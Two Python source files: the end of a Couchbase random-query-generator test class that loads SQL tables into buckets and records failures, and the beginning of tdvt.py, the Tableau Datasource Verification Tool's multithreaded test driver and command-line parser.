def _analyze_result(self, result):
check = True
failure_types = []
message = "\n ____________________________________________________\n "
for key in list(result.keys()):
if key != "test_case_number" and key != "n1ql_query" and key != "sql_query" and key!="check_explain_plan":
check = check and result[key]["success"]
if not result[key]["success"]:
failure_types.append(key)
message += " Scenario :: {0} \n".format(key)
message += " Reason :: " + str(result[key]["result"]) + "\n"
if key == "check_explain_plan":
check = check and result[key]["success"]
if not result[key]["success"]:
failure_types.append(key)
message += " Scenario :: {0} \n".format(key)
message += " Reason :: Secondary index is not in use\n"
return check, message, failure_types
def _check_and_push_failure_record_queue(self, result, data, failure_record_queue):
if not self.record_failure:
return
for key in list(result.keys()):
if key != "test_case_number" and key != "n1ql_query" and key != "sql_query" and not result[key]["success"]:
failure_record_queue.put(data)
def dump_failure_data(self, failure_record_queue):
if not self.record_failure:
return
import uuid
sub_dir = str(uuid.uuid4()).replace("-", "")
self.data_dump_path = self.failure_record_path+"/"+sub_dir
os.mkdir(self.data_dump_path)
input_file_path = self.data_dump_path+"/input"
os.mkdir(input_file_path)
f_write_file = open(input_file_path+"/source_input_rqg_run.txt", 'w')
secondary_index_path = self.data_dump_path+"/index"
os.mkdir(secondary_index_path)
database_dump = self.data_dump_path+"/db_dump"
os.mkdir(database_dump)
f_write_index_file = open(secondary_index_path+"/secondary_index_definitions.txt", 'w')
client = None
if self.use_mysql:
client = RQGMySQLClient(database=self.database, host=self.mysql_url, user_id=self.user_id, password=self.password)
elif self.use_postgres:
client = RQGPostgresClient()
client.dump_database(data_dump_path=database_dump)
client._close_connection()
f_write_index_file.write(json.dumps(self.sec_index_map))
f_write_index_file.close()
while not failure_record_queue.empty():
f_write_file.write(json.dumps(failure_record_queue.get())+"\n")
f_write_file.close()
def unzip_template(self, template_path):
if "zip" not in template_path:
return template_path
tokens = template_path.split("/")
file_name = tokens[len(tokens)-1]
output_path = template_path.replace(file_name, "")
with zipfile.ZipFile(template_path, "r") as z:
z.extractall(output_path)
template_path = template_path.replace(".zip", "")
return template_path
def _setup_and_load_buckets_from_files(self):
bucket_list = []
#Unzip the files and get bucket list
tokens = self.db_dump_path.split("/")
data_file_path = self.db_dump_path.replace(tokens[len(tokens)-1], "data_dump")
os.mkdir(data_file_path)
with zipfile.ZipFile(self.db_dump_path, "r") as z:
z.extractall(data_file_path)
onlyfiles = [f for f in listdir(data_file_path) if isfile(join(data_file_path, f))]
for file in onlyfiles:
bucket_list.append(file.split(".")[0])
# Remove any previous buckets
for bucket in self.buckets:
self.rest.delete_bucket(bucket.name)
self.buckets = []
# Create New Buckets
self._create_buckets(self.master, bucket_list, server_id=None, bucket_size=None)
# Wait till the buckets are up
self.sleep(15)
# Read Data from mysql database and populate the couchbase server
for bucket_name in bucket_list:
for bucket in self.buckets:
if bucket.name == bucket_name:
file_path = data_file_path+"/"+bucket_name+".txt"
with open(file_path) as data_file:
data = json.load(data_file)
self._load_data_in_buckets_using_mc_bin_client_json(bucket, data)
if self.populate_with_replay:
for key in list(data.keys()):
insert_sql = self.query_helper._generate_insert_statement_from_data(bucket_name, data[key])
self.client._insert_execute_query(insert_sql)
shutil.rmtree(data_file_path, ignore_errors=True)
def fill_advise_dict(self, bucket_list=[]):
for bucket in bucket_list:
if bucket not in self.advise_dict.keys():
self.advise_dict[bucket] = self.advise_buckets[0]
self.advise_buckets.remove(self.advise_buckets[0])
def _setup_and_load_buckets(self):
# Remove any previous buckets
if self.skip_setup_cleanup:
for bucket in self.buckets:
self.rest.delete_bucket(bucket.name)
self.buckets = []
if self.change_bucket_properties or self.gsi_type == "memory_optimized":
bucket_size = 100
else:
bucket_size = None
if self.change_bucket_properties:
shell = RemoteMachineShellConnection(self.master)
shell.execute_command("curl -X POST -u {0}:{1} -d maxBucketCount=25 http://{2}:{3}/internalSettings".format(self.user_cluster, self.password_cluster, self.master.ip, self.master.port))
self.sleep(10, "Updating maxBucket count to 25")
# Pull information about tables from mysql database and interpret them as no-sql dbs
table_key_map = self.client._get_primary_key_map_for_tables()
# Make a list of buckets that we want to create for querying
bucket_list = list(table_key_map.keys())
self.log.info("database used is {0}".format(self.database))
new_bucket_list = []
for bucket in bucket_list:
if bucket.find("copy_simple_table") > 0:
new_bucket_list.append(self.database+"_"+"copy_simple_table")
else:
new_bucket_list.append(self.database + "_" + bucket)
if self.subquery:
break
# Create New Buckets
self.fill_advise_dict(new_bucket_list)
self._create_buckets(self.master, new_bucket_list, server_id=None, bucket_size=bucket_size)
self.log.info("buckets created")
# Wait till the buckets are up
self.sleep(5)
self.buckets = self.rest.get_buckets()
self.newbuckets = []
for bucket in self.buckets:
if bucket.name in new_bucket_list:
self.newbuckets.append(bucket)
self.log.info("safe to start another job")
self.record_db = {}
self.buckets = self.newbuckets
# Read Data from mysql database and populate the couchbase server
for bucket_name in bucket_list:
query = "select * from {0}".format(bucket_name)
columns, rows = self.client._execute_query(query=query)
self.record_db[bucket_name] = self.client._gen_json_from_results_with_primary_key(columns, rows, primary_key=table_key_map[bucket_name])
if self.subquery:
for bucket in self.newbuckets:
if bucket.name == self.database+"_"+bucket_name:
self.load_subquery_test_data(bucket)
else:
for bucket in self.newbuckets:
if bucket.name == self.database+"_"+bucket_name:
self._load_bulk_data_in_buckets_using_n1ql(bucket, self.record_db[bucket_name])
def _populate_delta_buckets(self, table_name = "simple_table"):
if table_name != "simple_table":
client = self.client_map[table_name]
else:
client = self.client
query = "delete from {0} where primary_key_id is not null".format(table_name)
client._insert_execute_query(query=query)
query = "delete from {0} where primary_key_id is not null".format(self.database+"_"+table_name)
self.n1ql_query_runner_wrapper(n1ql_query=query, server=self.n1ql_server, verbose=True)
insert_sql = "insert into {0}(KEY k ,VALUE b) SELECT meta(b).id as k, b from {1} b where primary_key_id is not null".format(self.database+"_"+table_name,self.database+"_"+"copy_simple_table")
if self.use_advisor:
self.create_secondary_index("SELECT meta(b).id as k, b from {0} b where primary_key_id is not null".format(self.database+"_"+"copy_simple_table"))
try:
self.log.info("n1ql query is {0}".format(insert_sql))
self.n1ql_helper.run_cbq_query(query=insert_sql, server=self.n1ql_server, verbose=True)
insert_sql = "INSERT INTO {0} SELECT * FROM copy_simple_table".format(table_name)
client._insert_execute_query(insert_sql)
except Exception as ex:
self.log.info(ex)
def load_subquery_test_data(self, bucket):
query = 'select primary_key_id from simple_table_1'
result = self.client._execute_sub_query(query)
primary_key_values = result
query = 'CREATE TABLE IF NOT EXISTS {0}.`simple_table_2` ' \
'(`order_id` VARCHAR(100) NOT NULL,`qty` INT(11) NULL DEFAULT NULL,`productId` VARCHAR(1000) NOT NULL' \
',`price` DECIMAL(10,0) NOT NULL,`primary_key_id` VARCHAR(100) NOT NULL,PRIMARY KEY (`order_id`),' \
'FOREIGN KEY (`primary_key_id`) REFERENCES `simple_table_1`(`primary_key_id`))'.format(self.database)
self.client._db_execute_query(query)
for primary_key_value in primary_key_values:
query = 'select varchar_field1 from simple_table_1 where primary_key_id = {0}'.format(primary_key_value)
result = self.client._execute_sub_query(query)
varchar_field = result
query = 'select decimal_field1 from simple_table_1 where primary_key_id = {0}'.format(primary_key_value)
result = self.client._execute_sub_query(query)
decimal_field_value = result
query = 'select int_field1 from simple_table_1 where primary_key_id = {0}'.format(primary_key_value)
result = self.client._execute_sub_query(query)
int_field_value = result
query = 'select datetime_field1 from simple_table_1 where primary_key_id = {0}'.format(primary_key_value)
result = self.client._execute_sub_query(query)
datetime_field_value = result
query = 'select bool_field1 from simple_table_1 where primary_key_id = {0}'.format(primary_key_value)
result = self.client._execute_sub_query(query)
bool_field_value = bool(result)
query = 'select varchar_field1 from simple_table_1 where primary_key_id = {0}'.format(primary_key_value)
result = self.client._execute_sub_query(query)
varchar_value = result
query = 'select char_field1 from simple_table_1 where primary_key_id = {0}'.format(primary_key_value)
result = self.client._execute_sub_query(query)
char_value = result
orderid1 = "order-" + varchar_field
orderid2 = "order-" + str(self.query_helper._random_char()) + "_"+str(self.query_helper._random_int()) + varchar_field
price1 = self.query_helper._random_float()+10
price2 = self.query_helper._random_float()+100
qty1 = self.query_helper._random_int()
qty2 = self.query_helper._random_int()
query = 'insert into simple_table_2 (order_id, qty, productId, price, primary_key_id) values ("%s", %s, "snack", %s, %s)' % (orderid1, qty1, price1, primary_key_value)
self.client._insert_execute_query(query)
query = 'insert into simple_table_2 (order_id, qty, productId, price, primary_key_id) values ("%s", %s, "lunch", %s, %s)' % (orderid2, qty2, price2, primary_key_value)
self.client._insert_execute_query(query)
n1ql_insert_template = 'INSERT INTO %s (KEY, VALUE) VALUES ' \
'("%s", {"primary_key_id": "%s" ,"decimal_field1":%s,"int_field1":%s,' \
'"datetime_field1":"%s","bool_field1":%s,"varchar_field1":"%s",' \
'"char_field1":"%s","simple_table_2":[{"order_id":"%s","qty":%s,' \
'"productId":"snack","price":%s,"primary_key_id":"%s"},' \
'{"order_id":"%s","qty":%s,"productId":"lunch","price":%s,' \
'"primary_key_id":"%s"}] } )'\
% (bucket.name, primary_key_value, primary_key_value, decimal_field_value,
int_field_value, datetime_field_value, bool_field_value, varchar_value,
char_value, orderid1, qty1, price1, primary_key_value, orderid2, qty2,
price2, primary_key_value)
self.n1ql_helper.run_cbq_query(query=n1ql_insert_template, server=self.n1ql_server)
def _round_float_results(self, results, round_level=0):
if round_level > 0:
for res in results:
for key in res.keys():
if isinstance(res[key], float):
res[key] = round(res[key], round_level)
return results
|
tdvt.py
|
"""
Test driver script for the Tableau Datasource Verification Tool
"""
import sys
if sys.version_info[0] < 3:
raise EnvironmentError("TDVT requires Python 3 or greater.")
import argparse
import csv
import glob
import json
import pathlib
import queue
import shutil
import threading
import time
import zipfile
from pathlib import Path
from typing import List, Optional, Tuple, Union
from .config_gen.datasource_list import print_ds, print_configurations, print_logical_configurations
from .config_gen.tdvtconfig import TdvtInvocation
from .config_gen.test_config import TestSet, SingleLogicalTestSet, SingleExpressionTestSet, FileTestSet, TestConfig, RunTimeTestConfig
from .setup_env import create_test_environment, add_datasource
from .tabquery import *
from .tdvt_core import generate_files, run_diff, run_tests, run_connectors_test_core
from .version import __version__
# This contains the dictionary of configs you can run.
from .config_gen.datasource_list import WindowsRegistry, MacRegistry, LinuxRegistry
class TestOutputFiles(object):
output_actuals = 'tdvt_actuals_combined.zip'
output_tabquery_log = 'tabquery_logs.zip'
output_csv = "test_results_combined.csv"
output_json = "tdvt_output_combined.json"
all_output_files = [output_actuals, output_csv, output_json, output_tabquery_log]
combined_output = []
@classmethod
def copy_output_file(c, src_name, src_dir):
src = os.path.join(src_dir, src_name)
logging.debug("Copying {0} to output".format(src))
try:
with open(src, 'r', encoding='utf8') as src_file:
reader = csv.DictReader(src_file, dialect='tdvt')
for row in reader:
c.combined_output.append(row)
except IOError as e:
logging.debug("Exception while copying files: " + str(e))
return
@classmethod
def write_test_results_csv(c):
if not c.combined_output:
logging.debug("write_test_results_csv called with no test output")
return
logging.debug("Copying output to {0}".format(c.output_csv))
# Sort combined_output on the number of distinct functions (order of complexity)
sort_by_complexity = lambda row: len(row['Functions'].split(','))
try:
c.combined_output.sort(key=sort_by_complexity)
except KeyError as e:
logging.debug("Tried to sort output on a key that doesn't exist. Leaving output unsorted.")
dst = os.path.join(os.getcwd(), c.output_csv)
try:
dst_exists = os.path.isfile(dst)
with open(dst, 'w', encoding='utf8') as dst_file:
writer = csv.DictWriter(dst_file, fieldnames=c.combined_output[0],
dialect='tdvt', quoting=csv.QUOTE_MINIMAL)
writer.writeheader()
for row in c.combined_output:
writer.writerow(row)
except IOError as e:
logging.debug("Exception while writing to file: " + str(e))
return
def do_test_queue_work(i, q):
"""This will be called in a queue.join() context, so make sure to mark all work items as done and
continue through the loop. Don't try and exit or return from here if there are still work items in the queue.
See the python queue documentation."""
abort_test_run = False
while True:
# This blocks if the queue is empty.
work = q.get()
work.run()
q.task_done()
class TestRunner():
def __init__(self, test_set: TestSet, test_config: TdvtInvocation, lock, verbose, thread_id):
threading.Thread.__init__(self)
self.test_set = test_set
self.test_config = test_config
self.error_code = 0
self.thread_id = thread_id
self.verbose = verbose
self.thread_lock = lock
self.temp_dir = make_temp_dir([self.test_config.suite_name, str(thread_id)])
self.test_config.output_dir = self.temp_dir
def copy_files_to_zip(self, dst_file_name, src_dir, is_logs):
dst = os.path.join(os.getcwd(), dst_file_name)
mode = 'w' if not os.path.isfile(dst) else 'a'
optional_dir_name = self.test_config.config_file.replace('.', '_')
if is_logs is True:
log_dir = os.path.join(src_dir, optional_dir_name)
glob_path = glob.glob(os.path.join(log_dir, '*.txt'))
glob_path.extend(glob.glob(os.path.join(log_dir, '*.log')))
glob_path.extend(glob.glob(os.path.join(log_dir, 'crashdumps/*')))
else:
glob_path = glob.glob(os.path.join(src_dir, 'actual.*'))
with zipfile.ZipFile(dst, mode, zipfile.ZIP_DEFLATED) as myzip:
for actual in glob_path:
path = pathlib.PurePath(actual)
file_to_be_zipped = path.name
inner_output = os.path.join(optional_dir_name, file_to_be_zipped)
myzip.write(actual, inner_output)
def copy_output_files(self):
TestOutputFiles.copy_output_file("test_results.csv", self.temp_dir)
def copy_test_result_file(self):
src = os.path.join(self.temp_dir, "tdvt_output.json")
dst = os.path.join(os.getcwd(), TestOutputFiles.output_json)
try:
if not os.path.isfile(dst):
shutil.copyfile(src, dst)
else:
src_file = open(src, 'r', encoding='utf8')
results = json.load(src_file)
src_file.close()
dst_file = open(dst, 'r', encoding='utf8')
existing_results = json.load(dst_file)
dst_file.close()
existing_results['failed_tests'].extend(results['failed_tests'])
existing_results['successful_tests'].extend(results['successful_tests'])
existing_results['skipped_tests'].extend(results['skipped_tests'])
existing_results['disabled_tests'].extend(results['disabled_tests'])
# Check the newly succeeding tests, and if they are in the existing failed
# test list, remove them from the failed test list since they now succeed
for element in results['successful_tests']:
for failed in existing_results['failed_tests']:
if element['test_name'] == failed['test_name']:
existing_results['failed_tests'].remove(failed)
dst_file = open(dst, 'w', encoding='utf8')
json.dump(existing_results, dst_file)
dst_file.close()
except IOError:
return
def copy_files_and_cleanup(self):
left_temp_dir = False
try:
self.copy_files_to_zip(TestOutputFiles.output_actuals, self.temp_dir, is_logs=False)
self.copy_files_to_zip(TestOutputFiles.output_tabquery_log, self.temp_dir, is_logs=True)
self.copy_output_files()
self.copy_test_result_file()
except Exception as e:
print(e)
pass
try:
if not self.test_config.leave_temp_dir:
shutil.rmtree(self.temp_dir)
else:
left_temp_dir = True
except:
pass
return left_temp_dir
def run(self):
# Send output to null.
DEVNULL = open(os.devnull, 'wb')
output = DEVNULL if not self.verbose else None
logging.debug("\nRunning tdvt " + str(self.test_config) + " tdvt thread id: " + str(self.thread_id) + "\n")
print("Running {0} {1} {2}\n".format(self.test_config.suite_name, self.test_config.config_file,
str(self.thread_id)))
start_time = time.time()
self.test_config.thread_id = self.thread_id
failed_tests, skipped_tests, disabled_tests, total_tests = run_tests(self.test_config, self.test_set)
logging.debug("\nFinished tdvt " + str(self.test_config) + "\n")
print("\nFinished {0} {1} {2}\n".format(self.test_config.suite_name, self.test_config.config_file,
str(self.thread_id)))
self.failed_tests = failed_tests
self.skipped_tests = skipped_tests
self.disabled_tests = disabled_tests
self.total_tests = total_tests
def delete_output_files(root_dir):
for f in TestOutputFiles.all_output_files:
out_file = os.path.join(root_dir, f)
for f in glob.glob(out_file):
if os.path.exists(out_file):
try:
os.unlink(out_file)
except Exception as e:
print(e)
continue
def get_datasource_registry(platform):
"""Get the datasources to run based on the suite parameter."""
if sys.platform.startswith("darwin"):
reg = MacRegistry()
elif sys.platform.startswith("linux"):
reg = LinuxRegistry()
else:
reg = WindowsRegistry()
return reg
def enqueue_single_test(args, ds_info: TestConfig, suite) -> Union[Tuple[None, None], Tuple[Union[SingleLogicalTestSet, SingleExpressionTestSet], TdvtInvocation]]: # noqa: E501
if not args.command == 'run-pattern' or not args.tds_pattern or (args.logical_pattern and args.expression_pattern):
return None, None
test_set = None
if args.logical_pattern:
test_set = SingleLogicalTestSet(suite, get_root_dir(), args.logical_pattern, args.tds_pattern,
args.test_pattern_exclude, ds_info)
else:
test_set = SingleExpressionTestSet(suite, get_root_dir(), args.expression_pattern, args.tds_pattern,
args.test_pattern_exclude, ds_info)
#Only try and run tests if there are some.
if not test_set.generate_test_file_list():
return None, None
tdvt_invocation = TdvtInvocation(from_args=args, test_config=ds_info)
tdvt_invocation.tds = test_set.tds_name
tdvt_invocation.logical = test_set.is_logical
tdvt_invocation.config_file = test_set.config_name
return test_set, tdvt_invocation
def enqueue_failed_tests(run_file: Path, root_directory, args, rt: RunTimeTestConfig = None):
try:
with run_file.open('r', encoding='utf8') as file:
tests = json.load(file)
except IOError as e:
logging.error("Error opening " + str(run_file) + " error: " + str(e))
return
delete_output_files(os.getcwd())
all_test_configs = {}
all_tdvt_test_configs = {}
all_test_pairs = []
failed_tests = tests['failed_tests']
# Go through the failed tests and group the ones that can be run together in a FileTestSet.
for f in failed_tests:
test_file_path = f['test_file']
expected_message = f['expected_message'] if 'expected_message' in f else ''
test_root_dir = root_directory
tds_base = os.path.split(f['tds'])[1]
tds = get_tds_full_path(root_directory, tds_base)
logging.debug("Found failed test: " + test_file_path + " and tds " + tds)
tdvt_invocation = TdvtInvocation(from_json=f['test_config'])
if rt:
tdvt_invocation.set_run_time_test_config(rt)
tdvt_invocation.tds = tds
tdvt_invocation.leave_temp_dir = is_test(args) and args.noclean if args else False
suite_name = f['test_config']['suite_name']
password_file = f['password_file'] if 'password_file' in f else ''
# Use a hash of the test file path to distinguish unique test runs (since the config only supports one test path).
# other wise two tests with the same name could show up and the first result file would overwrite the second.
tt = "L" if tdvt_invocation.logical else "E"
test_set_unique_id = hashlib.sha224(
(os.path.split(test_file_path)[0] + "_" + tds_base + "_" + tt).replace("-", "_").encode())
test_set_unique_id = test_set_unique_id.hexdigest()
test_set_config = None
if not suite_name in all_test_configs:
all_test_configs[suite_name] = {}
if not test_set_unique_id in all_test_configs[suite_name]:
tdvt_invocation.output_dir = make_temp_dir([test_set_unique_id])
all_tdvt_test_configs[test_set_unique_id] = tdvt_invocation
run_time_config = RunTimeTestConfig(60*60, 1)
test_set_config = TestConfig(suite_name, '', run_time_config)
all_test_configs[suite_name][test_set_unique_id] = test_set_config
else:
test_set_config = all_test_configs[suite_name][test_set_unique_id]
current_test_set = None
if tdvt_invocation.logical:
current_test_set = test_set_config.get_logical_tests(test_set_unique_id)
else:
current_test_set = test_set_config.get_expression_tests(test_set_unique_id)
if current_test_set and len(current_test_set) == 1:
current_test_set = current_test_set[0]
if not current_test_set:
current_test_set = FileTestSet(suite_name, test_root_dir, test_set_unique_id, tds, tdvt_invocation.logical, suite_name,
password_file, expected_message)
if tdvt_invocation.logical:
test_set_config.add_logical_testset(current_test_set)
else:
test_set_config.add_expression_testset(current_test_set)
current_test_set.append_test_file(test_file_path)
for suite_names in all_test_configs:
for test_set_id in all_test_configs[suite_names]:
test_set_config = all_test_configs[suite_names][test_set_id]
for each_test_set in test_set_config.get_logical_tests() + test_set_config.get_expression_tests():
tdvt_invocation = all_tdvt_test_configs[test_set_id]
all_test_pairs.append((each_test_set, tdvt_invocation))
logging.debug("Queuing up tests: " + str(tdvt_invocation))
return all_test_pairs
def enqueue_tests(ds_info, args, suite):
tests = []
test_set_configs = []
if not is_test(args):
return test_set_configs
logging.debug("Enqueing tests for " + ds_info.dsname)
if args.logical_only or args.expression_only:
if args.logical_only:
tests.extend(ds_info.get_logical_tests(args.logical_only))
if args.expression_only:
tests.extend(ds_info.get_expression_tests(args.expression_only))
else:
tests.extend(ds_info.get_logical_tests(args.logical_only))
tests.extend(ds_info.get_expression_tests(args.expression_only))
# Make sure there are tests.
if not tests:
logging.error("No tests found")
return test_set_configs
for x in tests:
if not x.generate_test_file_list():
logging.error("No tests found for config " + str(x))
return test_set_configs
for test_set in tests:
tdvt_invocation = TdvtInvocation(from_args=args, test_config = ds_info)
tdvt_invocation.logical = test_set.is_logical_test()
tdvt_invocation.tds = test_set.tds_name
tdvt_invocation.config_file = test_set.config_name
test_set_configs.append((test_set, tdvt_invocation))
return test_set_configs
def get_level_of_parallelization(args):
# This indicates how many database/test suite combinations to run at once
max_threads = 6
if is_test(args) and args.thread_count:
max_threads = args.thread_count
max_threads = get_max_process_level_of_parallelization(max_threads)
print("Setting tdvt thread count to: " + str(max_threads))
return max_threads
list_usage_text = '''
Show all test suites or list the contents of a specific suite.
'''
list_logical_usage_text = '''
Show logical configs. The argument can be empty to list all, or you can specify a config by name.
'''
run_usage_text = '''
The 'run' argument can take a single datasource, a list of data sources, or a test suite name in any combination.
run postgres_odbc,postgres_jdbc
The 'run' argument can also take the --verify flag to run a connection test against tests with SmokeTest = True set.
run postgres_odbc --verify
Both logical and expression tests are run by default.
Run all expression tests
run postgres_odbc -e
Run all logical tests
run postgres_odbc -q
There are multiple suites of expression tests, for example, standard and LOD (level of detail). The config files that drive the tests
are named expression_test.sqlserver.cfg and expression.lod.sqlserver.cfg.
To run just one of those try entering part of the config name as an argument:
run postgres_odbc -e lod
'''
run_pattern_usage_text = '''
Run one expression test against many datasources
run-pattern postgres_odbc --exp exprtests/standard/setup.date.datepart.second*.txt --tdp cast_calcs.*.tds
Run one logical query test against many datasources
run-pattern postgres_odbc --logp logicaltests/setup/calcs/setup.BUGS.B1713.?.xml --tdp cast_calcs.*.tds
The 'exp' argument is a glob pattern that is used to find the test file using the relative test path.
The 'test-ex' argument can be used to exclude test files. This is a regular expression pattern.
The tds pattern is used to find the tds. Use a '*' character where the tds name will be substituted,
ie cast_calcs.*.tds
This can be combined with * to run an arbitrary set of 'correct' logical query tests against a datasources
run-pattern postgres_odbc --logp logicaltests/setup/calcs/setup.BUGS.*.?.xml --tdp cast_calcs.*.tds
Alternatively
run-pattern postgres_odbc --logp logicaltests/setup/calcs/setup.BUGS.*.dbo.xml --tdp cast_calcs.*.tds
But skip 59740?
run-pattern postgres_odbc --logp logicaltests/setup/calcs/setup.BUGS.*.dbo.xml --tdp cast_calcs.*.tds --test-ex 59740
'''
run_connectors_test_usage_text = '''
The commands below can be used to run the connectors tests.
'filename.xml' in the below commands is the path of the xml test file used to run the tests.
'passwordfilepath.password' in the below commands is the path of the password file used for the ServerVersionTest.
Run ConnectionBuilderTest
run-connectors-test --conn-test connectionBuilder --conn-test-file filepath.xml
Run NormalizeConnectionAttributes Test
run-connectors-test --conn-test normalizeConnectionAttributes --conn-test-file filepath.xml
Run MatchesConnectionAttributesTest
run-connectors-test --conn-test matchesConnectionAttributes --conn-test-file filepath.xml
Run PropertiesBuilderTest
run-connectors-test --conn-test propertiesBuilder --conn-test-file filepath.xml
Run ServerVersionTest
run-connectors-test --conn-test serverVersion --conn-test-file filepath.xml --conn-test-password-file passwordfilepath.password
'''
action_usage_text = '''
'''
run_file_usage_text = '''
'''
def create_parser():
parser = argparse.ArgumentParser(description='TDVT - Tableau Datasource Verification Tool.')
parser.add_argument('--verbose', dest='verbose', action='store_true', help='Verbose output.', required=False)
#Common run test options.
run_test_common_parser = argparse.ArgumentParser(description='Common test run options.', add_help=False)
run_test_common_parser.add_argument('--threads', '-t', dest='thread_count', type=int, help='Max number of threads to use.', required=False)
run_test_common_parser.add_argument('--no-clean', dest='noclean', action='store_true', help='Leave temp dirs.', required=False)
run_test_common_parser.add_argument('--generate', dest='generate', action='store_true', help='Generate logical query test files.', required=False)
run_test_common_parser.add_argument('--compare-sql', dest='compare_sql', action='store_true', help='Compare SQL.', required=False)
run_test_common_parser.add_argument('--nocompare-tuples', dest='nocompare_tuples', action='store_true', help='Do not compare Tuples.', required=False)
run_test_common_parser.add_argument('--compare-error', dest='compare_error', action='store_true', help='Compare error.', required=False)
subparsers = parser.add_subparsers(help='commands', dest='command')
#Get information.
list_parser = subparsers.add_parser('list', help='List information about datasource tests and suites.', usage=list_usage_text)
list_parser.add_argument(dest='list_ds', help='List datasource config.', default='', nargs='?')
list_logical_parser = subparsers.add_parser('list-logical-configs', help='List information about logical configurations.', usage=list_logical_usage_text)
list_logical_parser.add_argument(dest='list_logical_configs', help='List available logical configs.', default='', nargs='?')
#Actions.
action_group = subparsers.add_parser('action', help='Various non-test actions.', usage=action_usage_text)
action_group.add_argument('--setup', dest='setup', action='store_true', help='Create setup directory structure.', required=False)
action_group.add_argument('--add_ds', dest='add_ds', help='Add a new datasource.', required=False)
action_group.add_argument('--diff-test', '-dd', dest='diff', help='Diff the results of the given test (ie exprtests/standard/setup.calcs_data.txt) against the expected files. Can be used with the sql and tuple options.', required=False)
action_group.add_argument('--generate', dest='action_generate', action='store_true', help='Generate logical query test files.', required=False)
#Run tests.
run_test_parser = subparsers.add_parser('run', help='Run tests.', parents=[run_test_common_parser], usage=run_usage_text)
run_test_parser.add_argument('ds', help='Comma separated list of Datasource names or groups to test. See the \'list\' command.', nargs='+')
run_test_parser.add_argument('--verify', dest='smoke_test', action='store_true', help='Verifies the connection to a data source against tests in your .ini file with SmokeTest = True.', required=False) # noqa: E501
run_test_parser.add_argument('--force-run', dest='force_run', action='store_true', help='Attempts to run the tests for a data source, even if its smoke tests fail.')
run_test_parser.add_argument('--logical', '-q', dest='logical_only', help='Only run logical tests whose config file name matches the supplied string, or all if blank.', required=False, default=None, const='*', nargs='?')
run_test_parser.add_argument('--expression', '-e', dest='expression_only', help='Only run expression tests whose config file name matches the suppled string, or all if blank.', required=False, default=None, const='*', nargs='?')
#Run test pattern.
run_test_pattern_parser = subparsers.add_parser('run-pattern', help='Run individual tests using a pattern.', parents=[run_test_common_parser], usage=run_pattern_usage_text)
run_test_pattern_parser.add_argument('ds', help='Comma separated list of Datasource names or groups to test. See the \'list\' command.', nargs='+')
run_test_group = run_test_pattern_parser.add_mutually_exclusive_group(required=True)
run_test_group.add_argument('--exp', dest='expression_pattern', help='Only run expression tests whose name and path matches the supplied string. This is a glob pattern. Also you must set the tds-pattern to use when running the test.', required=False, default=None, const='', nargs='?')
run_test_group.add_argument('--logp', dest='logical_pattern', help='Only run logical tests whose name and path matches the supplied string. this is a glob pattern. Also you must set the tds-pattern to use when running the test. Use a ? to replace the logical query config component of the test name.', required=False, default=None, const='', nargs='?')
run_test_pattern_parser.add_argument('--tdp', dest='tds_pattern', help='The datasource tds pattern to use when running the test. See exp and logp arguments.', required=True, default=None, const='', nargs='?')
run_test_pattern_parser.add_argument('--test-ex', dest='test_pattern_exclude', help='Exclude tests whose name matches the supplied string. This is a regular expression pattern. Can be used with exp and logp arguments. Also set the tds-pattern to use when running the test.', required=False, default=None, const='', nargs='?')
#Run file.
run_file_parser = subparsers.add_parser('run-file', help='Run tests from a file.', parents=[run_test_common_parser], usage=run_file_usage_text)
run_file_parser.add_argument('run_file', help='Json file containing failed tests to run.')
#Run Connectors Test
run_connectors_test_parser = subparsers.add_parser('run-connectors-test', help='Run a connectors test using a file', parents=[run_test_common_parser], usage=run_connectors_test_usage_text)
run_connectors_test_parser.add_argument('--conn-test', dest='conn_test', help='Name of the Connectors Test to run.', required=True)
run_connectors_test_parser.add_argument('--conn-test-file', dest='conn_test_file', help='Path to the setup-expected file to run the connectors test', required=True)
run_connectors_test_parser.add_argument('--conn-test-password-file', dest='conn_test_password_file', help='Path to the password file used for the ServerVersionTest')
return parser
def register_tdvt_dialect():
custom_dialect = csv.excel
custom_dialect.lineterminator = '\n'
custom_dialect.delimiter = ','
custom_dialect.strict = True
custom_dialect.skipinitialspace = True
csv.register_dialect('tdvt', custom_dialect)
def init():
parser = create_parser()
args = parser.parse_args()
# Create logger.
logging.basicConfig(filename='tdvt_log_combined.txt', level=logging.DEBUG, filemode='w',
format='%(asctime)s %(message)s')
logger = logging.getLogger()
ch = logging.StreamHandler()
if 'verbose' in args and args.verbose:
# Log to console also.
ch.setLevel(logging.DEBUG)
else:
args.verbose = False
ch.setLevel(logging.WARNING)
logger.addHandler(ch)
logging.debug('TDVT version: ' + str(__version__))
logging.debug('TDVT Arguments: ' + str(args))
ds_reg = get_datasource_registry(sys.platform)
configure_tabquery_path()
register_tdvt_dialect()
return parser, ds_reg, args
def is_test(args):
return args.command in ['run', 'run-pattern', 'run-file', 'run-connectors-test']
def active_thread_count(threads):
active = 0
for t in threads:
if t.is_alive():
active += 1
return active
def test_runner(all_tests, test_queue, max_threads):
for i in range(0, max_threads):
worker = threading.Thread(target=do_test_queue_work, args=(i, test_queue))
worker.setDaemon(True)
worker.start()
test_queue.join()
failed_tests = 0
skipped_tests = 0
disabled_tests = 0
total_tests = 0
for work in all_tests:
if work.copy_files_and_cleanup():
print("Left temp dir: " + work.temp_dir)
failed_tests += work.failed_tests if work.failed_tests else 0
skipped_tests += work.skipped_tests if work.skipped_tests else 0
disabled_tests += work.disabled_tests if work.disabled_tests else 0
total_tests += work.total_tests if work.total_tests else 0
TestOutputFiles.write_test_results_csv()
return failed_tests, skipped_tests, disabled_tests, total_tests
def run_tests_impl(tests: List[Tuple[TestSet, TestConfig]], max_threads: int, args) -> Optional[Tuple[int, int, int, int]]:
if not tests:
print("No tests found. Check arguments.")
sys.exit()
smoke_test_queue = queue.Queue()
smoke_tests = []
test_queue = queue.Queue()
all_work = []
lock = threading.Lock()
for test_set, test_config in tests:
runner = TestRunner(test_set, test_config, lock, args.verbose, len(all_work) + 1)
if test_set.smoke_test:
smoke_tests.append(runner)
smoke_test_queue.put(runner)
else:
all_work.append(runner)
logging.debug("smoke test queue size is: " + str(len(smoke_tests)))
logging.debug("test queue size is: " + str(len(all_work)))
require_smoke_test = args.command == 'run' and args.smoke_test
force_run = args.command == 'run' and args.force_run
if not smoke_tests:
logging.warning("No smoke tests detected.")
if require_smoke_test:
sys.exit(1)
else:
logging.warning("Tests will run without verifying the data source connection.")
if not all_work and not smoke_tests:
print("No tests found. Check arguments.")
sys.exit()
failing_ds = set()
failed_smoke_tests = 0
skipped_smoke_tests = 0
